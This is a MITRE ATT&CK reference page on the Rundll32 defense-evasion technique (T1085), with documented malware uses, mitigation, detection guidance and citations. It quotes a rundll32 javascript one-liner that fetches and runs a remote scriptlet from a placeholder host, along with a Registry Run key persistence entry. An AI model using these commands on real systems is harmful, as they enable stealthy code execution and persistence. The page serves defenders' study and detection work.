Check out the results from our first round of ATT&CK Evaluations at attackevals.mitre.org!

Rundll32

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. [1]

Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. [2]

ID: T1085

Tactic: Defense Evasion, Execution

Platform:  Windows

Permissions Required:  User

Data Sources:  File monitoring, Process monitoring, Process command-line parameters, Binary file metadata

Supports Remote:  No

Defense Bypassed:  Anti-virus, Application whitelisting

Contributors:  Ricardo Dias, Casey Smith

Version: 1.0

Examples

NameDescription
ADVSTORESHELL

ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.[3]

APT19

APT19 configured its payload to inject into the rundll32.exe.[4]

APT28

APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe "C:\Windows\twain_64.dll". APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.[5][3][6][7]

APT3

APT3 has a tool that can run DLLs.[8]

Bisonal

Bisonal uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\"vert" = "rundll32.exe c:\windows\temp\pvcu.dll , Qszdez".[9]

Briba

Briba uses rundll32 within Registry Run Keys / Start Folder entries to execute malicious DLLs.[10]

Carbanak

Carbanak installs VNC server software that executes through rundll32.[11]

Comnie

Comnie uses Rundll32 to load a malicious DLL.[12]

CopyKittens

CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.[13]

CORESHELL

CORESHELL is installed via execution of rundll32 with an export named "init" or "InitW."[14]

CozyCar

The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.[15]

DDKONG

DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.[16]

Elise

After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.[17]

Emissary

Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.[18]

FELIXROOT

FELIXROOT uses Rundll32 for executing the dropper program.[19]

Flame

Rundll32.exe is used as a way of executing Flame at the command-line.[20]

gh0st

A gh0st variant has used rundll32 for execution.[21]

JHUHUGIT

JHUHUGIT is executed using rundll32.exe.[22]

Koadic

Koadic can use Rundll32 to execute additional payloads.[23]

Kwampirs

Kwampirs uses rundll32.exe in a Registry value added to establish persistence.[24]

Matroyshka

Matroyshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.[25]

Mosquito

Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.[26]

PowerDuke

PowerDuke uses rundll32.exe to load.[27]

Prikormka

Prikormka uses rundll32.exe to load its DLL.[28]

Pteranodon

Pteranodon executes functions using rundll32.exe.[29]

PUNCHBUGGY

PUNCHBUGGY can load a DLL using Rundll32.[30]

RTM

RTM runs its core DLL file using rundll32.exe.[31]

Sakula

Sakula calls cmd.exe to run various DLL files via rundll32.[32]

StreamEx

StreamEx uses rundll32 to call an exported function.[33]

Winnti

The Winnti installer loads a DLL using rundll32.[34]

Mitigation

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. [35]

Detection

Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.

References

  1. Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.
  2. B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
  3. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.
  4. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
  5. Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  6. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  7. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
  8. Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.
  9. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
  10. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.
  11. Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.
  12. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
  13. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
  14. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
  15. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
  16. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
  17. Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
  18. Falcone, R. and Miller-Osborn, J.. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016.
  1. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
  2. sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.
  3. Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018.
  4. F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016.
  5. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  6. Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.
  7. Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.
  8. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
  9. Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
  10. Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.
  11. Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  12. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
  13. Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
  14. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
  15. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
  16. Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017.
  17. National Security Agency. (2016, May 4). Secure Host Baseline EMET. Retrieved June 22, 2016.